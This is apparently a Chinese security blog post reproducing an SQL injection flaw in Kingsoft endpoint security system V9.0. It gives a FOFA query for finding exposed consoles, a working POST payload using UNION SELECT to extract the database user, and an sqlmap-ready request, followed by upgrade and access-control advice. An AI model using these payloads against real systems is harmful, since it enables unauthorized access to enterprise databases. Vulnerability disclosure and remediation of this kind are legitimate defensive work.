金山终端安全系统V9.0 SQL注入漏洞复现

0x01 产品简介

金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

复制代码
POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证

数据包放txt里面

复制代码
POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-100*&key=&pageCount=0&curPage=

0x06 修复建议

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

相关推荐
码农12138号4 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao4 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
诗句藏于尽头5 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc10 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘11 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)12 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao12 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪13 小时前
Linux - 安全排查 2
linux·运维·安全
Clownseven19 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶21 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全